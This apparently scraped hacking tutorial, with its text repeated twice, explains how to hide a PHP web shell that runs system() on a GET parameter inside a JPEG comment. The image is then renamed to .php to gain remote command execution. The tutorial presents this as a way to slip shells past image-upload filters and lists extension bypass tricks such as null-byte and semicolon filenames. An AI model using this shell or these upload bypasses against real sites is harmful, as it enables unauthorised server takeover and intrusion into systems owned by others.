What do we need?
an image (with the extension .JPG or .JPEG)
a program called edjpgcom.exe
www.softpedia.com
And a PHP code (of your choice)
For this tutorial we will use this code
<?php
echo "<pre>";
system($_GET['hackflag']);
echo "<pre>";
?>
What can you do with this code?
Well, with this you can execute commands, for example
if you go to index.php (with this code) you can type this in
index.php?hackflag=ping google.nl
and then it will Ping Google and then write the output into the php page.
Ok… Let's get started!
So first we take a random JPG image, I have one of a fish.
We drag this image (vis.jpg) onto edjpgcom.exe.
Now a screen will appear.
In this screen you now type your PHP code
in my case it is this
<?php
echo "<pre>";
system($_GET['hackflag']);
echo "<pre>";
?>
Now click OK
If you were to look in the source now you would see the script.
The image will still work (by the way, the image also works if you rename it to .TXT which is quite funny)
Now, we rename it to .PHP.
Now all vague TEXT will appear, that is the source of the image.
OK time to test it!
First let's ping Google
127.0.0.1/vis.php?hackflag=ping google.nl
And yes it works!
Now you may be wondering, What's in this for me?
Sometimes you try to upload a shell but you can't, because it's PHP, even if you use bypass techniques (vis.php;jpg | vis.php%00.jpg)
But now the site will think it's a real picture, giving you a better chance of uploading it!
I hope someone learns something from it
an image (with the extension .JPG or .JPEG)
a program called edjpgcom.exe
Download Portable JPEG Comment Editor
Download Portable JPEG Comment Editor 0.4 - Portable, lightweight and simple-to-use piece of software that lets you add or edit comments for JPG images, catering to all user levels
www.softpedia.com
And a PHP code (of your choice)
For this tutorial we will use this code
<?php
echo "<pre>";
system($_GET['hackflag']);
echo "<pre>";
?>
What can you do with this code?
Well, with this you can execute commands, for example
if you go to index.php (with this code) you can type this in
index.php?hackflag=ping google.nl
and then it will Ping Google and then write the output into the php page.
Ok… Let's get started!
So first we take a random JPG image, I have one of a fish.
We drag this image (vis.jpg) onto edjpgcom.exe.
Now a screen will appear.
In this screen you now type your PHP code
in my case it is this
<?php
echo "<pre>";
system($_GET['hackflag']);
echo "<pre>";
?>
Now click OK
If you were to look in the source now you would see the script.
The image will still work (by the way, the image also works if you rename it to .TXT which is quite funny)
Now, we rename it to .PHP.
Now all vague TEXT will appear, that is the source of the image.
OK time to test it!
First let's ping Google
127.0.0.1/vis.php?hackflag=ping google.nl
And yes it works!
Now you may be wondering, What's in this for me?
Sometimes you try to upload a shell but you can't, because it's PHP, even if you use bypass techniques (vis.php;jpg | vis.php%00.jpg)
But now the site will think it's a real picture, giving you a better chance of uploading it!
I hope someone learns something from it
